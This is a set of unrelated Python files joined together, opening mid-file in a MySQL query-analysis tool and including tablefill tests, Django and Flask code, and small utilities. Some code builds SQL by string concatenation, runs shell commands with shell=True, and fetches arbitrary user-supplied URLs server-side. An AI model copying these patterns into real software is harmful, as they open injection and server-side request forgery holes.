cursor.execute("select index_name,last_update last_analyzed,stat_name,stat_value,sample_size,stat_description from mysql.innodb_index_stats a where database_name='" + p_dbinfo[4] + "' and table_name='" + p_tablename + "' order by index_name,stat_name")
records = cursor.fetchall()
cursor.close()
db.close()
return records
def f_print_indexstat(p_index_stat):
if len(p_index_stat) > 0:
print_table(['index_name', 'last_analyzed', 'stat_name', 'stat_value', 'sample_size', 'stat_description'], p_index_stat, ['l', 'c', 'l', 'r', 'r', 'l'])
def f_get_mysql_version(p_dbinfo):
db = MySQLdb.connect(host=p_dbinfo[0], port=int(p_dbinfo[1]), user=p_dbinfo[2], passwd=p_dbinfo[3], db=p_dbinfo[4])
cursor = db.cursor()
cursor.execute("select @@version")
records = cursor.fetchall()
cursor.close()
db.close()
return records[0][0]
def f_print_title(p_dbinfo, p_mysql_version):
print()
print('*' * 100)
    print('*', 'thanks for using - mysql sql exfmt tool - Shane.Qian#foxmail.com'.center(96), '*')
print('*' * 100)
print()
print("\033[1;31;40m%s\033[0m" % "===== BASIC INFORMATION =====")
print_table(['server_ip', 'server_port', 'user_name', 'db_name', 'db_version'], [[p_dbinfo[0], p_dbinfo[1], p_dbinfo[2], p_dbinfo[4], p_mysql_version]])
print()
def f_print_orisql(p_sqltext):
print("\033[1;31;40m%s\033[0m" % "===== ORIGINAL SQL TEXT =====")
print(sqlparse.format(p_sqltext, reindent=True, keyword_case='upper'))
print()
def timediff(timestart, timestop):
    t = (timestop - timestart)
    time_day = t.days
    s_time = t.seconds
    ms_time = t.microseconds / 1000000
    usedtime = int(s_time + ms_time)
    # integer division keeps the hour/minute/second components whole under Python 3
    time_hour = usedtime // 60 // 60
    time_minute = (usedtime - time_hour * 3600) // 60
    time_second = usedtime - time_hour * 3600 - time_minute * 60
    time_micsecond = t.microseconds // 1000
    retstr = "%d day %d hour %d minute %d second %d microsecond " % (time_day, time_hour, time_minute, time_second, time_micsecond)
    return retstr
def readfs(fsname):
if not fsname.strip():
return ""
with open(fsname) as f:
return ''.join(f.readlines())
def usage():
print("""usage:
%s -p [config_ini] { -s [sql] | -f [sql_file] }
""" % sys.argv[0])
if __name__ == "__main__":
if not PY3PLUS:
print("\033[1;31;40m%s\033[0m" % "ERR: this tool was recommended to use python3 !")
sys.exit(2)
if len(sys.argv) != 5:
usage()
sys.exit(1)
dbinfo = ["", "", "", "", ""] # dbhost,dbport,dbuser,dbpwd,dbname
sqltext = ""
option = []
config_file = ""
mysql_version = ""
opts, args = getopt.getopt(sys.argv[1:], "p:s:f:")
for o, v in opts:
# XXX: socket ?
if o == "-p":
config_file = v
elif o == "-s":
sqltext = v
elif o == "-f":
sqltext = readfs(v)
if config_file == "" or sqltext == "":
usage()
sys.exit(1)
# if sqlparse.sql.Statement(sql_metadata.get_query_tokens(sqltext)).get_type() != 'SELECT':
# if sqlparse.sql.Statement(sqlparse.parse(sqltext)[0].tokens).get_type() != 'SELECT':
    # shane: CTEs ('with ...') only exist from MySQL 8 and/or may be parsed as 'UNKNOWN' here..
tmpss = sqlparse.parse(sqltext)
if len(tmpss) > 1 or tmpss[0].get_type() != 'SELECT':
print(sqltext)
        tmps = input('-- please check/confirm that this sql is safe/correct to execute [y/n] : ')
        if str.strip(tmps) != 'y':
            print("\033[1;31;40m%s\033[0m" % "WRN: [Reminder] explaining/executing a statement that is not a plain SELECT can be dangerous or meaningless !")
sys.exit(3)
config = configparser.ConfigParser()
config.read_file(open(config_file, "rt"))
dbinfo[0] = config.get("database", "server_ip")
dbinfo[1] = config.get("database", "server_port")
dbinfo[2] = config.get("database", "db_user")
dbinfo[3] = config.get("database", "db_pwd")
dbinfo[4] = config.get("database", "db_name")
mysql_version = f_get_mysql_version(dbinfo).split('-')[0]
f_print_title(dbinfo, mysql_version)
if config.get("option", "sys_parm") == 'ON':
parm_result = f_get_parm(dbinfo)
optimizer_switch_result = f_get_optimizer_switch(dbinfo)
f_print_parm(parm_result)
f_print_optimizer_switch(optimizer_switch_result)
f_print_orisql(sqltext)
table_list = []
if config.get("option", "sql_plan") == 'ON':
sqlplan_result = f_get_sqlplan(dbinfo, sqltext)
f_print_sqlplan(sqlplan_result['SQLPLAN'], sqlplan_result['WARNING'], mysql_version)
table_list = list(set([i[2] for i in sqlplan_result['SQLPLAN']]))
if config.get("option", "obj_stat") == 'ON':
print("\033[1;31;40m%s\033[0m" % "===== OBJECT STATISTICS =====")
# for table_name in table_list:
# for table_name in extract_tables(sqltext):
for table_name in sql_metadata.get_query_tables(sqltext):
f_print_tableinfo(f_get_tableinfo(dbinfo, table_name))
f_print_indexinfo(f_get_indexinfo(dbinfo, table_name))
f_print_indexstat(f_get_indexstat(dbinfo, table_name))
print()
if config.get("option", "ses_status") == 'ON':
option.append('STATUS')
if config.get("option", "sql_profile") == 'ON':
option.append('PROFILING')
if config.get("option", "ses_status") == 'ON' or config.get("option", "sql_profile") == 'ON':
exec_title_add = ""
starttime = datetime.datetime.now()
exec_result = f_exec_sql(dbinfo, sqltext, option)
endtime = datetime.datetime.now()
if config.get("option", "ses_status") == 'ON':
f_print_status(f_calc_status(exec_result['BEFORE_STATUS'], exec_result['AFTER_STATUS']))
exec_title_add = exec_title_add + "StatusOn" + "+"
if config.get("option", "sql_profile") == 'ON':
f_print_profiling(exec_result['PROFILING_DETAIL'], exec_result['PROFILING_SUMMARY'])
exec_title_add = exec_title_add + "ProfileOn" + "+"
f_print_time(exec_title_add, starttime, endtime)
f_print_hit(f_get_hit(dbinfo))
f_print_extr(dbinfo)
|
#! /usr/bin/env python
# ---------------------------------------------------------------------
# Tests for tablefill.py
# TODO(mauricio): Implement error codes in CLI version
from subprocess import call
import unittest
import os
import sys
sys.path.append('../')
from nostderrout import nostderrout
from tablefill import tablefill
program = 'python ../tablefill.py --silent'
class testTableFillFunction(unittest.TestCase):
def getFileNames(self):
self.input_appendix = 'input/tables_appendix.txt input/tables_appendix_two.txt'
self.input_nolabel = 'input/tables_appendix.txt input/tables_nolabel.txt'
self.input_fakeone = 'input/fake_file.txt input/tables_appendix_two.txt'
self.input_faketwo = 'input/tables_appendix.txt input/fake_file.txt'
self.texoutput = './input/tablefill_template_filled.tex'
self.lyxoutput = './input/tablefill_template_filled.lyx'
self.texoutputnodir = './input/does/not/exist/tablefill_template_filled.tex'
self.lyxoutputnodir = './input/does/not/exist/tablefill_template_filled.lyx'
self.pytemplate = 'input/tablefill_template.py'
self.blanktemplate = 'input/tablefill_template'
self.textemplate = 'input/tablefill_template.tex'
self.textemplatebreaks = 'input/tablefill_template_breaks.tex'
self.textemplatetext = '../test/input/textfill_template.tex'
self.textemplatenolab = 'input/tablefill_template_nolab.tex'
self.textemplatewrong = 'input/tablefill_template_wrong.tex'
self.lyxtemplate = 'input/tablefill_template.lyx'
self.lyxtemplatebreaks = 'input/tablefill_template_breaks.lyx'
self.lyxtemplatetext = '../test/input/textfill_template.lyx'
self.lyxtemplatenolab = 'input/tablefill_template_nolab.lyx'
self.lyxtemplatewrong = 'input/tablefill_template_wrong.lyx'
def testInput(self):
self.getFileNames()
with nostderrout():
statuslyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate,
output = self.lyxoutput)
statustex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate,
output = self.texoutput)
self.assertEqual('SUCCESS', statustex)
self.assertEqual('SUCCESS', statuslyx)
# Given my message changes length, I need to change this
# self.assertEqual(len(tag_data) + 13, len(filled_data))
        # Also, their tag comparison would be a pain to implement. See
        # the tests at the bottom instead.
def testBreaksRoundingString(self):
self.getFileNames()
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplatebreaks,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplatebreaks,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('InvalidOperation', msgtex)
self.assertIn('InvalidOperation', msglyx)
def testIllegalSyntax(self):
self.getFileNames()
# missing arguments
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('KeyError', msgtex)
self.assertIn('KeyError', msglyx)
# Must be strings
with nostderrout():
errorlyx, msglyx = tablefill(input = [self.input_appendix],
template = self.lyxtemplate,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = [self.input_appendix],
template = self.textemplate,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('TypeError', msgtex)
self.assertIn('TypeError', msglyx)
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate,
output = 10)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate,
output = 10)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('TypeError', msgtex)
self.assertIn('TypeError', msglyx)
# unexpected arguments are ignored
with nostderrout():
statuslyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate,
waffle = "My Waffles are Best!",
output = self.lyxoutput)
statustex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate,
waffle = "My Waffles are Best!",
output = self.texoutput)
self.assertEqual('SUCCESS', statustex)
self.assertEqual('SUCCESS', statuslyx)
def testIllegalArgs(self):
self.getFileNames()
# Must be lyx or tex
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.pytemplate,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.blanktemplate,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('KeyError', msgtex)
self.assertIn('KeyError', msglyx)
# But you can override if you know the file type
with nostderrout():
statustex, msgtex = tablefill(input = self.input_appendix,
template = self.pytemplate,
output = self.texoutput,
filetype = 'tex')
self.assertEqual('SUCCESS', statustex)
# non-existent output folder
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplate,
output = self.lyxoutputnodir)
errortex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplate,
output = self.texoutputnodir)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('IOError', msgtex)
self.assertIn('IOError', msglyx)
# non-existent input 1
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_fakeone,
template = self.lyxtemplate,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = self.input_fakeone,
template = self.textemplate,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('IOError', msgtex)
self.assertIn('IOError', msglyx)
# non-existent input 2
with nostderrout():
errorlyx, msglyx = tablefill(input = self.input_faketwo,
template = self.lyxtemplate,
output = self.lyxoutput)
errortex, msgtex = tablefill(input = self.input_faketwo,
template = self.textemplate,
output = self.texoutput)
self.assertEqual('ERROR', errortex)
self.assertEqual('ERROR', errorlyx)
self.assertIn('IOError', msgtex)
self.assertIn('IOError', msglyx)
def testArgumentOrder(self):
self.getFileNames()
with nostderrout():
statuslyx, msglyx = tablefill(template = self.lyxtemplate,
input = self.input_appendix,
output = self.lyxoutput)
statustex, msgtex = tablefill(template = self.textemplate,
input = self.input_appendix,
output = self.texoutput)
self.assertEqual('SUCCESS', statustex)
self.assertEqual('SUCCESS', statuslyx)
texfilled_data_args1 = open(self.texoutput, 'rU').readlines()
lyxfilled_data_args1 = open(self.lyxoutput, 'rU').readlines()
with nostderrout():
statuslyx, msglyx = tablefill(output = self.lyxoutput,
template = self.lyxtemplate,
input = self.input_appendix)
statustex, msgtex = tablefill(output = self.lyxoutput,
template = self.lyxtemplate,
input = self.input_appendix)
self.assertEqual('SUCCESS', statustex)
self.assertEqual('SUCCESS', statuslyx)
texfilled_data_args2 = open(self.texoutput, 'rU').readlines()
lyxfilled_data_args2 = open(self.lyxoutput, 'rU').readlines()
self.assertEqual(texfilled_data_args1, texfilled_data_args2)
self.assertEqual(lyxfilled_data_args1, lyxfilled_data_args2)
# ------------------------------------------------------------------
# The following test uses three files that are WRONG but the
# original tablefill.py ignores the issues. This gives a warning.
def testMissingLabel(self):
self.getFileNames()
# Pattern outside of table
with nostderrout():
warnlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplatewrong,
output = self.lyxoutput)
warntex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplatewrong,
output = self.texoutput)
self.assertEqual('WARNING', warntex)
self.assertEqual('WARNING', warnlyx)
# No label in tables
with nostderrout():
warnlyx, msglyx = tablefill(input = self.input_appendix,
template = self.lyxtemplatenolab,
output = self.lyxoutput)
warntex, msgtex = tablefill(input = self.input_appendix,
template = self.textemplatenolab,
output = self.texoutput)
self.assertEqual('WARNING', warntex)
self.assertEqual('WARNING', warnlyx)
# No label in template
with nostderrout():
warnlyx, msglyx = tablefill(input = self.input_nolabel,
template = self.lyxtemplate,
output = self.lyxoutput)
warntex, msgtex = tablefill(input = self.input_nolabel,
template = self.textemplate,
output = self.texoutput)
self.assertEqual('WARNING', warntex)
self.assertEqual('WARNING', warnlyx)
class testTableFillCLI(unittest.TestCase):
def getFileNames(self):
self.input_appendix = 'input/tables_appendix.txt input/tables_appendix_two.txt'
self.input_nolabel = 'input/tables_appendix.txt input/tables_nolabel.txt'
self.input_fakeone = 'input/fake_file.txt input/tables_appendix_two.txt'
self.input_faketwo = 'input/tables_appendix.txt input/fake_file.txt'
self.texoutput = './input/tablefill_template_filled.tex'
self.lyxoutput = './input/tablefill_template_filled.lyx'
self.texoutputnodir = './input/does/not/exist/tablefill_template_filled.tex'
self.lyxoutputnodir = './input/does/not/exist/tablefill_template_filled.lyx'
self.pytemplate = 'input/tablefill_template.py'
self.blanktemplate = 'input/tablefill_template'
self.textemplate = 'input/tablefill_template.tex'
self.textemplatebreaks = 'input/tablefill_template_breaks.tex'
self.textemplatetext = '../test/input/textfill_template.tex'
self.textemplatenolab = 'input/tablefill_template_nolab.tex'
self.textemplatewrong = 'input/tablefill_template_wrong.tex'
self.lyxtemplate = 'input/tablefill_template.lyx'
self.lyxtemplatebreaks = 'input/tablefill_template_breaks.lyx'
self.lyxtemplatetext = '../test/input/textfill_template.lyx'
self.lyxtemplatenolab = 'input/tablefill_template_nolab.lyx'
self.lyxtemplatewrong = 'input/tablefill_template_wrong.lyx'
def testInput(self):
self.getFileNames()
lyxinforce = (program, self.lyxtemplate, self.input_appendix)
lyxinout = (program, self.lyxtemplate, self.input_appendix, self.lyxoutput)
lyxinforce_status = call('%s %s --input %s --force' % lyxinforce, shell = True)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
self.assertEqual(0, lyxinforce_status)
self.assertEqual(0, lyxinout_status)
texinforce = (program, self.textemplate, self.input_appendix)
texinout = (program, self.textemplate, self.input_appendix, self.texoutput)
texinforce_status = call('%s %s --input %s --force' % texinforce, shell = True)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(0, texinforce_status)
self.assertEqual(0, texinout_status)
def testBreaksRoundingString(self):
self.getFileNames()
lyxinout = (program, self.lyxtemplatebreaks, self.input_appendix, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.textemplatebreaks, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
def testIllegalSyntax(self):
self.getFileNames()
# missing arguments
lyxinout = (program, self.lyxtemplate, self.input_appendix)
lyxinout_status = call('%s %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_appendix)
texinout_status = call('%s %s --input %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
        # unexpected arguments give an error courtesy of argparse
lyxinout = (program, self.lyxtemplate, self.input_appendix, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s hello' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s hello' % texinout, shell = True)
self.assertEqual(2, lyxinout_status)
self.assertEqual(2, texinout_status)
lyxinout = (program, self.lyxtemplate, self.input_appendix, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s --waffle hi' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s --waffle hi' % texinout, shell = True)
self.assertEqual(2, lyxinout_status)
self.assertEqual(2, texinout_status)
def testIllegalArgs(self):
self.getFileNames()
lyxinout = (program, self.pytemplate, self.input_appendix, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.pytemplate, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
texinout = (program, self.pytemplate, self.input_appendix, self.texoutput)
texinout_status = call('%s %s --input %s --output %s --type tex' % texinout, shell = True)
self.assertEqual(0, texinout_status)
lyxinout = (program, self.lyxtemplate, self.input_appendix, self.lyxoutputnodir)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_appendix, self.texoutputnodir)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
lyxinout = (program, self.lyxtemplate, self.input_fakeone, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_fakeone, self.texoutput)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
lyxinout = (program, self.lyxtemplate, self.input_faketwo, self.lyxoutput)
lyxinout_status = call('%s %s --input %s --output %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.input_faketwo, self.texoutput)
texinout_status = call('%s %s --input %s --output %s' % texinout, shell = True)
self.assertEqual(1, lyxinout_status)
self.assertEqual(1, texinout_status)
def testArgumentOrder(self):
self.getFileNames()
lyxinout = (program, self.lyxtemplate, self.lyxoutput, self.input_appendix)
lyxinout_status = call('%s %s --output %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.texoutput, self.input_appendix)
texinout_status = call('%s %s --output %s --input %s' % texinout, shell = True)
self.assertEqual(0, lyxinout_status)
self.assertEqual(0, texinout_status)
texfilled_data_args1 = open(self.texoutput, 'rU').readlines()
lyxfilled_data_args1 = open(self.lyxoutput, 'rU').readlines()
# Since input takes multiple inputs, this actually fails
lyxinout = (program, self.lyxoutput, self.input_appendix, self.lyxtemplate)
lyxinout_status = call('%s --output %s --input %s %s' % lyxinout, shell = True)
texinout = (program, self.texoutput, self.input_appendix, self.textemplate)
texinout_status = call('%s --output %s --input %s %s' % texinout, shell = True)
self.assertEqual(2, lyxinout_status)
self.assertEqual(2, texinout_status)
# But this is also OK
lyxinout = (program, self.lyxoutput, self.input_appendix, self.lyxtemplate)
lyxinout_status = call('%s --output %s --input %s --type lyx %s' % lyxinout, shell = True)
texinout = (program, self.texoutput, self.input_appendix, self.textemplate)
texinout_status = call('%s --output %s --input %s --type tex %s' % texinout, shell = True)
self.assertEqual(0, lyxinout_status)
self.assertEqual(0, texinout_status)
texfilled_data_args2 = open(self.texoutput, 'rU').readlines()
lyxfilled_data_args2 = open(self.lyxoutput, 'rU').readlines()
self.assertEqual(texfilled_data_args1, texfilled_data_args2)
self.assertEqual(lyxfilled_data_args1, lyxfilled_data_args2)
# ------------------------------------------------------------------
# The following test uses three files that are WRONG but the
# original tablefill.py ignores the issues. This gives a warning.
def testMissingLabel(self):
self.getFileNames()
lyxinout = (program, self.lyxtemplatewrong, self.lyxoutput, self.input_appendix)
lyxinout_status = call('%s %s --output %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplatewrong, self.texoutput, self.input_appendix)
texinout_status = call('%s %s --output %s --input %s' % texinout, shell = True)
self.assertEqual(255, lyxinout_status)
self.assertEqual(255, texinout_status)
lyxinout = (program, self.lyxtemplatenolab, self.lyxoutput, self.input_appendix)
lyxinout_status = call('%s %s --output %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplatenolab, self.texoutput, self.input_appendix)
texinout_status = call('%s %s --output %s --input %s' % texinout, shell = True)
self.assertEqual(255, lyxinout_status)
self.assertEqual(255, texinout_status)
lyxinout = (program, self.lyxtemplate, self.lyxoutput, self.input_nolabel)
lyxinout_status = call('%s %s --output %s --input %s' % lyxinout, shell = True)
texinout = (program, self.textemplate, self.texoutput, self.input_nolabel)
texinout_status = call('%s %s --output %s --input %s' % texinout, shell = True)
self.assertEqual(255, lyxinout_status)
self.assertEqual(255, texinout_status)
if __name__ == '__main__':
os.getcwd()
unittest.main()
|
# from import_export.admin import ImportExportModelAdmin
from django.contrib.admin import register, ModelAdmin, TabularInline
from .models import Campus, Solicitacao
class SolicitacaoInline(TabularInline):
model = Solicitacao
extra = 0
@register(Campus)
class CampusAdmin(ModelAdmin):
list_display = ['sigla', 'descricao', 'active', 'homepage']
search_fields = ['sigla', 'descricao', 'suap_id', 'url']
list_filter = ['active', 'homepage']
inlines = [SolicitacaoInline]
@register(Solicitacao)
class SolicitacaoAdmin(ModelAdmin):
list_display = ['timestamp', 'status', 'status_code', 'campus', 'resposta']
search_fields = ['campus', 'requisicao', 'requisicao_invalida', 'requisicao_header', 'resposta', 'resposta_header', 'resposta_invalida']
autocomplete_fields = ['campus']
date_hierarchy = 'timestamp'
list_filter = ['status', 'status_code', 'campus']
ordering = ('-timestamp',)
|
from .MainMenu import MainMenu
from .CategoryMenu import CategoryMenu
from .MenuTypes import MenuTypes
class FactoryMenu:
@staticmethod
def get_menu(_type: str):
if _type == MenuTypes.category:
return CategoryMenu()
elif _type == MenuTypes.main:
return MainMenu()
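# Usage sketch (illustrative; assumes MenuTypes.category and MenuTypes.main are
# the string constants compared against above):
#     menu = FactoryMenu.get_menu(MenuTypes.main)      # -> MainMenu()
#     menu = FactoryMenu.get_menu(MenuTypes.category)  # -> CategoryMenu()
# Any other value falls through both branches and yields None.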
|
class BendVertex:
    def __init__(self, time, val):
        self.t = time
        self.v = val
    def copy(self):
        return BendVertex(self.t, self.v)
    def __eq__(self, other):
        return self.t == other.t and self.v == other.v
class Bend:
    def __init__(self, vertices=[]):
        self.vs = list(vertices)
    def copy(self):
        return Bend(v.copy() for v in self.vs)
    def __eq__(self, other):
        return self.vs == other.vs
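# Minimal usage sketch (illustrative values): a bend is a list of (time, value)
# vertices; copy() duplicates the vertices and __eq__ compares by value.
#     bend = Bend([BendVertex(0.0, 0), BendVertex(1.0, 12)])
#     clone = bend.copy()
#     assert clone == bend and clone is not bend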
|
from services.scraper import Scraper
def init_scraper_service(base_url=None, next_button_text=None,
letter_list_uri=None, letter_list_page_uri=None,
result_item_selector=None, printer=None, db=None,
*args, **kwargs) -> Scraper:
options = {
'base_url': base_url,
'next_button_text': next_button_text,
'letter_list_uri': letter_list_uri,
'letter_list_page_uri': letter_list_page_uri,
'result_item_selector': result_item_selector,
'printer': printer,
'db': db,
}
return Scraper(**options)
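# Usage sketch (hypothetical values; the real URLs/selectors depend on the
# target site and on what services.scraper.Scraper expects):
#     scraper = init_scraper_service(
#         base_url='https://example.com',
#         next_button_text='Next',
#         result_item_selector='.result-item',
#     )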
|
import unittest
from translator import english_to_french, french_to_english
class TestE2F(unittest.TestCase):
def test1(self):
with self.assertRaises(TypeError):
english_to_french() # pylint: disable=no-value-for-parameter
        self.assertEqual(english_to_french("Hello"), "Bonjour")  # test the translation of the word 'Hello' to 'Bonjour'
class TestF2E(unittest.TestCase):
def test1(self):
with self.assertRaises(TypeError):
french_to_english() # pylint: disable=no-value-for-parameter
        self.assertEqual(french_to_english("Bonjour"), "Hello")  # test the translation of the word 'Bonjour' to 'Hello'
if __name__ == '__main__':
    unittest.main()
|
"""
Symbol
Types to represent a symbolic evaluation.
"""
from typing import NewType, Union
Constant = NewType('Constant', str)
Variable = NewType('Variable', int)
Symbol = Union[Constant, Variable]
def constant(bin_str: str) -> Constant:
"""
Transform the given binary value into a typesafe Constant.
Ensures that the input string is '0' or '1'.
:param bin_str: the binary string to be converted
:return: the Constant
    :raises ValueError if the input is not a binary value
"""
if bin_str in ('0', '1'):
return Constant(bin_str)
else:
        raise ValueError('{0} is not a binary constant'.format(bin_str))
def variable(var_id: int) -> Variable:
"""
Transform the given id into a typesafe Variable.
Ensures that the input is not 0.
:param var_id: the variable id to be converted
:return: the Variable
:raises ValueError if the input is not a valid id
"""
if var_id != 0:
return Variable(var_id)
else:
raise ValueError('0 cannot be used as variable')
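# Minimal usage sketch (illustrative only): build one Constant and one Variable
# and show that a non-binary input is rejected.
if __name__ == '__main__':
    one = constant('1')   # a Constant
    x = variable(3)       # a Variable
    print(one, x)
    try:
        constant('2')     # not '0' or '1' -> ValueError
    except ValueError as err:
        print(err)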
|
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# author: zsun
# @Time : 2018/09/20 20:28
# @Author : Zhongyuan Sun
class Singleton(type):
    def __init__(cls, name, bases, attrs):
        super(Singleton, cls).__init__(name, bases, attrs)
        cls.instance = None
    def __call__(cls, *args, **kwargs):
        if cls.instance is None:
            cls.instance = super(Singleton, cls).__call__(*args, **kwargs)
        return cls.instance
class MyClass(metaclass=Singleton):
    def __init__(self, name):
        self.name = name
    def pp(self):
        print(self.name)
def main():
a = MyClass("xx")
a.pp()
b = MyClass("yy") # b.name will still be xx
b.pp()
if __name__ == "__main__":
main()
|
from flask import request, g, redirect, json, jsonify, Response
from viewsource import app
# import pydevd
from urllib.error import URLError
from urllib.request import urlopen, Request
from urllib.parse import urlparse
from hashlib import md5
from .helpers import beautify, file_extension, decorate_response
@app.route('/sources', methods=['GET'])
def get_source():
try:
url = request.args.get('url')
headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) '
'Chrome/51.0.2704.103 Safari/537.36'
}
response = urlopen(Request(url, headers=headers, method='GET'))
charset = response.info().get_charset()
decoded_source = response.read().decode(charset) if charset else response.read().decode('latin1')
extension = file_extension(urlparse(url).path)
try:
            content_type = (response.headers['Content-Type'] or 'text/html') if not extension else None
decoded_source = beautify(decoded_source, content_type, extension)
except SyntaxError:
pass
response = jsonify({'data': {'id': md5(url.encode('utf-8')).hexdigest(), 'type': 'sources',
'attributes': {'source_code': decoded_source}}})
""":type: Response"""
decorate_response(response)
return response
except (URLError, ValueError) as e:
fully_qualified_tmpl = 'Please enter a fully qualified URL: {0}'
please_check_tmpl = 'Please check URL: {0}'
error = fully_qualified_tmpl.format(url) if isinstance(e, ValueError) else please_check_tmpl.format(url)
response = jsonify(
{'errors': [{'status': 400, 'title': 'URL Error', 'detail': error}]})
decorate_response(response)
return response, 400
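# Usage sketch (illustrative request; host/port depend on how the app is run):
#     GET /sources?url=https://example.com/
# On success this returns a JSON:API-style body with the (optionally beautified)
# page source under data.attributes.source_code; invalid or unreachable URLs
# come back as a 400 error document.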
|
from django.shortcuts import render
from .models import User_Model
# Create your views here.
def users(request):
    user_list = User_Model.objects.all()
    return render(request, 'users.html', {'users': user_list})
|
from django.apps import AppConfig
class FinanceAppConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'finance_app'
|
#
# PySNMP MIB module CISCO-UNIFIED-COMPUTING-AAA-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/CISCO-UNIFIED-COMPUTING-AAA-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 17:58:20 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
Integer, OctetString, ObjectIdentifier = mibBuilder.importSymbols("ASN1", "Integer", "OctetString", "ObjectIdentifier")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, ValueSizeConstraint, ValueRangeConstraint, ConstraintsUnion, SingleValueConstraint = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "ValueSizeConstraint", "ValueRangeConstraint", "ConstraintsUnion", "SingleValueConstraint")
ciscoMgmt, = mibBuilder.importSymbols("CISCO-SMI", "ciscoMgmt")
CiscoAlarmSeverity, TimeIntervalSec, CiscoNetworkAddress, Unsigned64, CiscoInetAddressMask = mibBuilder.importSymbols("CISCO-TC", "CiscoAlarmSeverity", "TimeIntervalSec", "CiscoNetworkAddress", "Unsigned64", "CiscoInetAddressMask")
CucsManagedObjectId, CucsManagedObjectDn, ciscoUnifiedComputingMIBObjects = mibBuilder.importSymbols("CISCO-UNIFIED-COMPUTING-MIB", "CucsManagedObjectId", "CucsManagedObjectDn", "ciscoUnifiedComputingMIBObjects")
